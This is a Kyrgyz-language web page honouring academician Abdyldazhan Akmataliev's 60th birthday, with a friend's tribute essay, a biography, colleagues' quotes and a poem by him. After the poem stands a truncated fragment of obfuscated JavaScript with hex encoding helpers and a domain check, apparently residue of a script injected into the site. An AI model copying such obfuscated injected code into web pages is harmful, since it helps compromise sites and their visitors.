ИНТЕЛЛЕКТУАЛДЫК ДҮЙНөСҮН АСЫЛ САПАТТАР МЕНЕН ШИРЕЛТКЕН ИНСАН

Окумуштуу дос жөнүндө ой толгоо

«Антташып айткан мамиле

Ынтымак менен коштолот.

Бир болгон өйдө-төмөндө

Дос деген сендей дос болот.

Жылдыздар удаа жанашса,

Адамга – адам куш болот.

Бир келген жаман-жакшыда,

Дос деген сендей дос болот».

                                                                                              (Б. Борбиев)

Адатта «тоголок» жаш келгенде юбилярды кесиптештери, дос-жолдоштору менен тууган-уруктары кызуу куттукташат эмеспи. Өзгөчө эл-жерине, тандап алган кесибине жандалбас уруп, бүткүл өмүрүн ошол кесибине арнап, төбөсү көрүнгөн таанымал инсандарга куттуктоо айтуу кыйла татаал жана  жоопкерчиликтүү тура. Анткени залкар жазуучубуз, гуманист-философ, тубаса талант Чыкем айткандай, «күн сайын адам болуш», адамдык касиетти жоготпоо, инсандык абройду түшүрбөй, жараткан берген шыпааны колдон алдырбай жашоо, чындыгында эле ар бир пендеге берилген оор жүк тура. Андыктан, бир чети андай жүктү көтөрүш, коомчулук алдындагы жоопкерчилик менен милдетти аткарыш оңой-олтоң иш эмес дагы, экинчиден, бардык эле адамдардын колунан келе бербейт окшойт. Мен муну менен эмнени айткым бар: 60 жаштын алгылуу белесине жеткен, мекенине, тандап алган адабият таануу  кесибине, элинин көөнөрбөс маданиятына опол тоодой эмгеги сиңген,  Улуттук илимдер академиясынын бир четин, болгондо да «улуттук» деген статус берген коомдук илимдерди жетектеген, бүт өмүрүн ушул академияга арнаган академик досум Мелис (Абдылдажан) Акматалиев жөнүндө азыноолак ой бөлүшсөм дейм. Себеби Мекем, жогоруда сөз кылган адамдык сапаттын сынын түшүрбөй, эли алдында нар көтөргүс кызмат өтөп келе жатат десем аша чапкандык кылбас.

Арийне, аты чыккан белгилүү инсандардын юбилейлери жакындаганда, көбүн эсе аларды мактап-жактап жатып калчу адатыбыз бар эмеспи.  Аны жакындан билген адам катары мен андай ойдон алысмын. Анткени экөөбүздүн академиядагы  өткөргөн өмүрүбүз кырк жылга чукулдап калыптыр. Кырк жыл  бою үзөңгүлөш, илимдеги болгон тепкичтердин баардыгын басып өтүп, ал КР УИАнын вице-президенттигине көтөрүлсө, мен институттун директорлугуна жеттим. Өткөн жылдарда академиялык фундаменталдык илимдин гүлдөп турган учурундагы жана эгемендүүлүктүн мезгилиндеги катаалчылыктарды да баштан бирге өткөздүк. Дегинкиси биздин муун (50-жылдардагы) бактылуулардан экенбиз деп ойлом, анткени биз кылым  оошуп (XX-XXI-кк.) бир коомдук системанын экинчиге (социализмден капитализмге) өтүшүнүн күбөсү эле болбостон  (мындай мезгил ар бир эле муундун тагдырына туш келе бербейт), академиялык илимдин  пайдубалын түптөгөн залкар окумуштуу инсандар менен дагы иштешип калганыбыз үчүн бактыбыз бар деп айтсам ашыкча болбос.

Артка бир кылчайып карасак, илимдин түйшүгүндө жүргөн жылдардын ичинде ал экөөбүз көптөгөн кесиптештерди, жолдош-досторду күткөнгө дагы жетишипбиз. «Биз ким элек, ким болдук» деп, академиялык турмушту эске салганда Мекемдин терең философиялык өңүттө баа берген бир ою бар: «Мен илимдеги өткөн өмүрүбүздү бир маршруттагы автобуста баратканыбыздагыдай элестетем, кокусунан илимге келип калгандар улам бир аялдамадан түшүп калып, туруктуулар дагы деле болсо ичинде кетип бара жаткандайбыз»,  -деген. Чындыгында эле өткөн жылдарда нечендеген убактылуу «илимпозчуларга», «баш оту» менен илимге кирген кесиптештер менен дагы эриш-аркак келе жатабыз. Арийне, жашоонун мыйзамынын үстөмдүгүнөн жалпы пенделердей эле жоготууларга дагы дуушар болдук. Жалпысынан алганда, илим жолундагы турмуш бизди туруктуулукка калыптандырып, окумуштуу деген улуу даражаны татыктуу көтөрүп жүргөнгө тарбиялады деген ойдомун.

Дегинкиси, 60 жаш өзүнчө эле  Байдыкем айткандай, «ашуудан берген отчет» дагы эмеспи.  Ошол ашуудагы отчетко бирөөлөр канжыгасы  жеңил келсе, экинчилери куржун толо дүйнөсү менен жетет. Ал эми Мекемдин жүгү баягы эле Кытайдан  келе жаткан соодагердин кербениндей эле бар. Мунун баардыгына өзүнүн карандай эмгеги, көшөргөн мээнети менен жетти.  Андан сырткары турмуштун парадоксу ушундай экен да: биз бала кезде алтымышка толгон сакал мурутчан аксакалдарды көрүп абышкадай мамиле жасайт элек, азыр жетимиштеги байкени көрүп «абышка» же «чал» дегенге ооз барбайт. Анткени калк ичинде кеңири ооздон-оозго айтылып жүргөндөй, адам жетимишке келгенде «жетилет» деп коет экен. Андыктан Мекем  алтымышка эми гана толуп, азыркы кезде «табында турган аргымак» сыяктуу ишке жана чыгармачылык эргүүгө тойбой турган чагы.  Ошол эмгекчил, өжөр, иштермандыгынын акыбети кайтып,  бүгүнкү күнү  эрдик кылган кыргыз уулу өз эл-жерине эки эсе мээнет өтөп, калктын урмат-сыйына бөлөнүп, татыктуу баасын алып, асмандагы жылдыздай балбылдап жанып, кадыр-барк, абройдун туу  чокусу болгон зоболосу көкөлөп турган чагы.

Бул турмушта  баардыгы болот турбайбы. Сыймыгы артып сыйлыгы көбөйүп кеткенде адамдын көзүн май басып, аркы-беркини аңдабай, көкүрөгү көтөрүлүп, дымагы артып, кечээ эле аралашып, ажырагыстай болуп жүргөн чөйрөсүн жерип, дымагы аттын башындай болуп, ал тургай «күн тийген жердин күкүгүнө» айланып кеткен учурларга көп эле жолугуп, көңүл кирдеткен абалдар деле болот эмеспи.

 

«Нанды бөлүп, бирге жеген тамагы,

Достор бүгүн – достор эмес баягы.

Кекирейтет, сөөмөйлөрүн чычайтат,

Колундагы бийлик деген таягы».

(А. Акматалиев «Көңүлдөгү өмүр»,-Б.:2015. 171 б.)

 

Мекем ушул куракка келгенге чейин адамдагы мындай ыплас сапаттардан алыс болгондугуна, улуу менен кичүүгө бирдей мамиле жасаган жөнөкөйлүгүнө, жупунулугуна ыраазы болом. Кээде ушундай жөнөкөйлүк адамдар тарабынан дайым эле баалана бербестигин эстеп бушайман да болгон учурларым болот.  Эмнеси болсо да анын өмүр, илимий-чыгармачылык изденүү жолунун узак болушун жана ошол өрүү жолдо туткан «адамдык» ыйык касиетине таазим этем десем болот.  Дегеле табият адамдарды бир кылка, окшош кылбай, айрымдарын кара мүртөз, таш боор, жалкоо кылса, кээ бирлерин ак ниет, эмгекчил кылып коет турбайбы. Ошол эмгекчилдик акыры жумурай журт тарабынан эртеби-кечпи бааланат экен. Кубантаары Мекемдин жасап жаткан иштери жалпы коомчулук,Өкмөт тарабынан бааланып жатат жана дагы деле баалана бермекчи десем болот. Кудайга шүгүр, анын ак эмгеги текке кетпей, Кыргыз Республикасынын илимине Эмгек сиңирген ишмер, КР илим жана техника жаатындагы Мамлекеттик сыйлыктын эки жолку лауреаты, КР УИАнын эң жогорку И. Ахунбаев атындагы сыйлыктын ээси, «Манас» ордени, «Даңк» медалы, эл аралык көптөгөн наам-сыйлыктарга татыды.

«Кеп чынынан бузулбайт» дейт эмеспи. Анын сыңары Мекем азыркы кезде эл аралык деңгээлде белгилүү болуп калган окумуштууга айланып отурат. Ал биздин өлкөдө эле эмес, Түркия, Германия, Франция, Бельгия, Люксембург, Кытай, Япония, Корея о.э. жакынкы чет өлкөлөрдө уюштурулуп, өткөрүлгөн көптөгөн илимий конференция, симпозиум жыйындарга активдүү катышып, бир катар баяндамаларды жасагандыгы белгилүү. Анын айрым эмгектери бөлөк тилдерге да которулуп, жарык көргөндүгүн баса белгилей кетүү жөндүү. Мекемдин эмгектеринде Айтматовдун каармандарынын жан-дүйнөсү бай, жогорку маданияттын адамдары экени, жазуучунун чыгармаларынын негизги философиясы – жогорку гуманизм пафосу аркылуу адамдагы кайрымдуулуктун жана асылдык идеясын даңазалангандыгын көрүүгө болот. Ч.Айтматовдун чыгармаларын изилдөө табигый жөндөмдүүлүктү гана эмес чоң теориялык, орошон практикалык билимди да талап кылат. Залкар жазуучунун чыгармалары бир канча мезгил өткөндөн кийин да кайра жаңырып, жаңы мазмуну ачылып турары калетсиз, анын сыңары Мекемдин изилдөөлөрүнүн дөөлөтү да ошол сындуу табышмактуу касиетке ээ боло берет деген ишеничтемин.

Демек, ал диалектикалык маанайда чыгармачыл-масштабдуу ой жүгүрткөн инсан, келечекке ишенимдүү серп салган окумуштуу жана уюштуруучу иретинде илим-билимге бүтүндөй жан дили, атуулдук дарамети менен берилип, чыгармачыл изилдөөнүн карама-каршылыктуу дүйнөсүнө улам сүңгүп, өз элинин, айрыкча коомчулуктун алдында ак эмгек өтөп жатат десек эч жаңылышпайбыз.

Мекем бүгүнкү күндө  интеллектуалдык дүйнөсүн асыл  сапаттар менен ширелткен инсан иретинде тазалыктын, эмгекчилдиктин, абийирдүүлүктүн, жөнөкөйлүктүн, кесипкөйлүктүн, мекенчилдиктин кийинки илимпоздук ишмердикти аркалаган муундар үчүн үлгүсүн көрсөттү деп айтууга толук негиз бар. Деген менен анын жазганынан жаза элеги, ачканынан ача элеги, айтканынан айта элеги али арбын деп ырастоого толук акылуубуз. Анын алдында дагы аша турган ашуусу, кече турган терең далай дарыялар, басып өтө турган узак жолдор күтүп турганы айдан ачык. Андыктан алардын баарын буюрса, досум арт жагына калтыраарынан да эч кандай шек саноого болбойт деп бекем ишенем. Көрсө, «талант деген – токсон тогуз пайыз эмгек» деп бекеринен айтылбаса керек. Ошондуктан кажыбас кайратты майтарылбаган эрки менен элге таанылган таланттуу инсандардын турмушу татымдуу экендигин эч танууга болбойт. Анын уюштуруучулугун, лидерлигин «Манаста» айтылгандай,«алдына салса ак жолтой, артта жүрсө сан колдой» азаматтыгын, адамгерчилигин айтып жазгандар жеке эле мен болбосом керек. «Эр эмгегин эл баалайт» демекчи, анын эмгектери, илимдеги аракеттеринин баардыгы күнүбүгүнкүдөй менин көз алдымда. Бүгүнкү 60 жаш кутман курагыңда чын ниеттен кааларым, асыл иштериңдин айлампасында ар дайым аман болуп, алгалай бер досум – Меке!

 

О.А.Тогусаков, КР УИАнын Философия жана саясий-укуктук изилдөөлөр институтунун директору, КР УИАнын корреспондент-мүчөсү, КР Илимине эмгек сиңирген ишмер, КР Мамлекеттик жана И.Ахунбаев атындагы жогорку академиялык сыйлыктарынын лауреаты, философия илимдеринин доктору, профессор

 

А.Акматалиев баскан жол

 

Жыл жаңырары менен белгилүү окумуштуу,Кыргыз Республикасынын Илимине эмгек сиңирген ишмерАбдылдажан Акматалиев  бүтүндөй агартуу тармагынын өкүлдөрү жана илимий чөйрө менен биргеликте  60 жылдык мааракесин белгилөө алдында турат. Юбилярдын замандаштары айтмакчы, жарым кылымдан ашык өмүрүндө А.Акматалиев нар көтөргүс иш жасап, илим айдыңында ушул күнгө чейин күжүрмөндүк менен эмгектенип келет. Маараке алдында илимпоздун  өмүрүнүн жана илимий,  коомдук ишмердүүлүгүнүн негизги учурларына сарэсеп салабыз.  

 

Өмүр баяны: 1956-жылы 15-январда туулган. 1972-жылы Фрунзе шаарынын №5 орто мектебин аяктаган. 1977-жылы Кыргыз мамлекеттик университетинин филология факультетин бүтүргөн. 1977-1979-жылдары Ош педагогикалык институтунда мугалим болуп иштеген. 1979-жылдан  баштап бүгүнкү күнгө чейин Илимдер академиясында иштейт. Тил жана адабият институту 1992-1994-жыл, Манастаануу жана көркөм маданияттын Улуттук борбору 1995-2008-жыл, Ч.Айтматов атындагы Тил жана адабият институту 2008-2013-жылга чейин институттардын директору, 1992-жылдан 2013-жылга чейин институттун директору, 2013-жылдан бери вице-президент. Эмгек стажысы – 39 жыл.

 

Илимий-педагогикалык эмгектери: 45 монография, китеп, 7 брошюранын, 650 макаланын, маектин автору. Эмгектери түрк, орус, англис, немец, француз, кытай, япон, казак, өзбек, азербайжан тилдеринде жарык көргөн. Жетекчилиги менен кыргыз маданиятына байланыштуу 500дөн ашуун ири эмгектер:. “Эл адабияты” (31 том) сериясы, “Залкарлар” (7 том) сериясы, “Орусча-кыргызча” (4 том) сөздүк, кыргыз жана орус тилдеринде, “Ч.Айтматовдун чыгармаларынын 8 томдугу”, С.Каралаевдин (4 том) жана С.Орозбаковдун вариантында “Манас” (9 том) “Кыргыз тилинин түшүндүрмө сөздүгү” (2 том), “Сагымбай”, “Алыкул Осмонов”, “Токтогул” энциклопедиялары, Махмуд Кашгаринин “Түрк сөздөр жыйнагынын” (3 том), Жусуп Баласагындын “Кут алчу билим” (3 том), “Түрк адабиятынын жыйнактары” (33 том) ж.б. жарыкка чыккан. 1992-2015-жылдары 1000ден ашуун китептерди демөөрчү таап  чыгарган, алар окуу китеби жана окуу куралы катары коомчулукта кеңири пайдаланылып жатат.

 

Илимий-педагогикалык кадры: Диссертациялык кеңештин төрагасы (1994-2006, 2013-2015-ж.),  ЖАКтын эксперти (2006-2008-ж), Президиумдун мүчөсү (2009-2013-ж.) катары 200дөн ашуун кадрлардын чыгышына камкордук кылган. Өзү  12 илимдин докторун, 57 илимдин кандидатын даярдаган. Кадрлары республиканын бардык региондорун камтыйт, ошону менен бирге орус, түрк, кытай, казак улутунан да бар.

Илимий багыттары: Кыргыз тили, адабияты жана маданияты, “Манас” эпосу, Ч.Айтматов, фольклор, акындар поэзиясы, профессионал адабияты, кыргыз маданияты.

 

Илимий наам, даражалары: Илимдер академиясынын академиги, филология илимдеринин доктору, профессор, Кыргыз Республикасынын Илимине эмгек сиңирген ишмер, Кыргыз Республикасынын илим жана техника жаатындагы Мамлекеттик сыйлыктын эки жолку лауреаты, Кыргызстан Ленин комсомолу сыйлыгынын лауреаты, Эл агартуунун отличниги, Ж.Баласагын атындагы Улуттук университетинин, К.Карасаев атындагы Бишкек гуманитардык университетинин, И.Арабаев атындагы Кыргыз мамлекеттик университетинин, Ош мамлекеттик университетинин, Жалал-Абад мамлекеттик университетинин, К.Тыныстанов атындагы ЫМУнун, Талас мамлекеттик университетинин, Нарын мамлекеттик университетинин, Махмуд Кашгари Барсканы атындагы Чыгыш университетинин, Ата Түрк-Ала-Тоо университетинин жана Япониянын Сока-Гаккай университетинин Ардактуу профессору, Түркиянын тил коомунун академиги, Америка Калифорния Илимдер жана искусство академиясынын академиги.

 

Сыйлыктары: СССРдин “Эмгектеги артыкчылыгы” медалы, ВЛКСМ БКнын Ардак грамотасы, ЛКСМ БКнын Ардак грамотасы, III даражадагы “Манас” ордени, “Даңк” медалы, Россиянын Кыргызстандагы элчилигинин Ардак грамотасы, Казакстандын Кыргызстандагы элчилигинин Ардак грамотасы, Түштүк Кореянын Маданият жана туризм министрлигинин Ардак грамотасы,  Казакстандын Л.Гумилев атындагы университеттин Гумилев медалы, Бишкек шаарынын, Ош шаарынын Ардак грамотасы, Нарын жана Талас областарынын, Нарын жана Токтогул райондорунун Ардактуу атуулу, Бишкек шаарынын ардактуу атуулу, академик И.Ахунбаев атындагы сыйлыктын лауреаты,  Кыргыз Республикасынын Жогорку Кеңешинин Ардак Грамотасы ж.б.

Илимий-педагогикалык ишмердүүлүгү: Эл аралык 160 жана республикалык 600дөн ашуун илимий-практикалык конференциянын уюштуруучусу жана катышуучусу. Москва, Пекин, Токио, СЕУЛ, Астана, Париж, Анкара, Стамбул, Кония, Элазык, Измир, Баку, Ташкент, Ашхабад, Нукус, Казан, Уфа, Алма-Ата, Жамбыл, Түркстан, Кызыл Ордо, Алтай, Абакан ж.б. шаарларда илимий докладдарды окуган.

 

Республикалык жана чет элдик илимий-практикалык ишмердүүлүгү: Кыргыз улуттук университеттин, Кыргыз-Түрк “Манас” университетинин, И.Арабаев атындагы КМУнун, С.Демирель университетинин, Казак-Түрк Ахмед Ясави атындагы университетинин жана Түркиянын Анкара университетинин окутуучусу, “Билге” журналынын (Түркия), “Билиг” журналынын (Түркия), “Кардеш калемгер” журналынын (Түркия), “Түркология” журналынын (Казакстан), “Алтаистика” жана “Түркология” (Казакстан) журналынын, “Түрк ааламы” газетасынын (Казакстан), “Кыргызстан маданияты” газетасынын (Кыргызстан), “Кыргыз тили” (Кыргызстан), “Адабий Ала-Тоо” гезитинин (Кыргызстан), “Эл агартуу” журналынын (Кыргызстан), “Тил, адабият жана искусство” журналынын (Кыргызстан), “Мурас” журналынын (Кыргызстан) ж.б. редколлегия мүчөсү.

 

Коомдук ишмердүүлүгү: Түштүк Корея республикасынын Азия маданий шаарынын куруу боюнча эл аралык кеңешинин мүчөсү, Жазуучулар Союзунун мүчөсү, Журналисттер Союзунун мүчөсү, Ысык-Көл форумунун катышуучусу.

 

 

 Замандаштардан бир ооз кеп

А.Сайфуллаев, филология илимдеринин доктору, профессор,

Тажик ССРинин Маданиятына эмгек сиңирген ишмер:

– А.Акматалиевдин темасы конкреттүү. Теманын изилдөө обьектиси азербайжан, өзбек, түркмөн, татар, казак, каракалпак адабияттарынын өнүгүшүнө байланышкан материалдар болуп, аларга өзгөчө басым жасалат. Автордун түрк тилиндеги адабияттар менен эң сонун тааныш экендиги жакшы сезилип турат. Бул – түрк тилиндеги жогоруда аталган адабияттарды алардын өз ара байланыштарында жана өз ара аракеттеринде жалпылаган туңгуч эмгек.

“Эркин-Тоо”, 1991, 14-август.

 

К.Каракеев, академик:

– Мага бөтөнчө илимпоздун изилдөө принциби менен методикасы жакты. Эмгектерде тарых, адабият таануу илимдеринде али күнгө  чейин ар тараптуу анализдөөнүн объектисине айлана элек илимий булактар алгач жолу комплекстүү салыштырылып, жалпыланып, терең эриш-аркак иликтенген.

“Кутбилим”, 2000, 30-ноябрь.

 

А.Измаилов, академик:

– А.Акматалиевдин кийинки жарык көргөн эки китебин мен ата-бабалардын оозеки сапатынан, улуттук каада-салттардан улам алыстап бара жаткан кыргыз жаштарына, жеткинчектерге арналган баалуу белек деп эсептейм.

“Эркин Тоо”, 2000, 6-декабрь.

 

Байлыгым менин – шакирттерим ээрчиген…

Абдылдажан Акматалиев

  Байлыгым менин – шакирттерим ээрчиген,

Тагдырлары мен аркылуу чечилген.

Турмуш деген татаал жолдо келатат,

Кыркар тарткан кырк чородой сезилген.

 

Түрдүү-түмөн ойлор менен алышып,

Казуу үчүн илим кенин карышып.

Өткөөл заман кыйындыкка карабай,

Келаткандай ат чабышта жарышып.

 

Байге алгыла – ар кимиңер өзгөчө,

Ак эмгектүү жетет ага көздөсө.

Жайгаштырып, келсем улам тизмелеп,

Мамлекет сыяктанат өзүнчө.

 

Желектери тураар бийик асылып,

Күлкү-шаттык маңдайында чачылып.

Эл-жер үчүн кызмат кылса чын дилден,

Такшалышат, тажрыйбасы артылып.

 

Дүйшөндүн да болгон бир кез мектеби,

Ысык-суукка чыдап келген эстеби?!

Шакирттерден күтүп келем мен дагы,

Алтынайдай академик кездеги.

 

Билим жолун кетсе алдыга узартып,

Ойлорумду жаңылашып улантып.

Эл алдында жүзүм жарык көрүнөт,

Шакирттерим турса мени кубантып.

 

Жолун тосуп көрө албастар кайдагы,

Ушагында тумандатса жаш жанды.

Ишенбедим, ишенгеним “Абийир” – деп,

Мамилемден өзгөрбөдүм мурдагы.

 

Душмандардан ичке кирген – азыткы,

Сактай албай тебелеткен актыкты.

Көлөкөдөн корккон айрым суу жүрөк,

Анан чыкты кээ бирөөлөр сасыткы.

 

Кечегүнкү камкордукту унутушуп,

Жан дүйнөнүн тынчын алып, бузушуп.

Ичи арамдын ити өлүп ичинде,

Башка дилди, башка динди тутушуп.

 

Кошоматчы, маңкурт сымал жан багаар,

Дагы кимиң – байлык берсе алданаар?!

Абийир таза, менден деги кетпеди,

Аман болсок мезгил элеп, такталаар.

 

Шакирттерим, куулук жолун ойлобо,

Өзүмчүлдүн  арамдыгын колдобо.

Бөлүп жарар, бузукулук көп болот,

“Бирөө айтат” – деп, отту кармап ойнобо!

 

Жан дүйнөдө дудук болуп көз көрбөй,

Бийлик берсе бир заматта өзгөрмөй.

Арамдыктын аягы кууш, жолу – адаш,

Турмушумда көптү көрдүм – өзгөрбөй.

 

Пенде болуп ачуум менен тийдимби,

Зордоп, кордоп мен Силерди ийдимби.

Баарыбызды Кудай турат калыстап,

Жолтоо болуп, артың түшүп – чийдимби?!

 

Адил болуу – өмүрдөгү максатым,

Илим жолун ар кимиңе такташтым.

Шакирттерим, ачык болсун жолуңар,

Элим үчүн илимиңер жактаттым.

 

Мезгил өтүп, Силер ээлеп устатты,

Күтөсүңөр кадыр-баркты, турпатты.

Доору менен кадамдатып илимди,

Милдетиңер тарбиялоо урпакты.

 

Кырк чоромдун – кырк мүнөзү ар кандай,

Бири түнт да, бири шайыр – ак маңдай.

Заман кыйын,  татаалдыктан тартынбай,

Умтулушат тоскоолдуктан жазганбай.

 

Байлыгым менин – шакирттерим ээрчиген,

Тагдырлары мен аркылуу чечилген.

Турмуш деген татаал жолдо келатат,

Кыркар тарткан кырк чородой сезилген.

 

 

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kutbilim.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Оставьте первый комментарий

Оставить комментарий

Ваш электронный адрес не будет опубликован.


*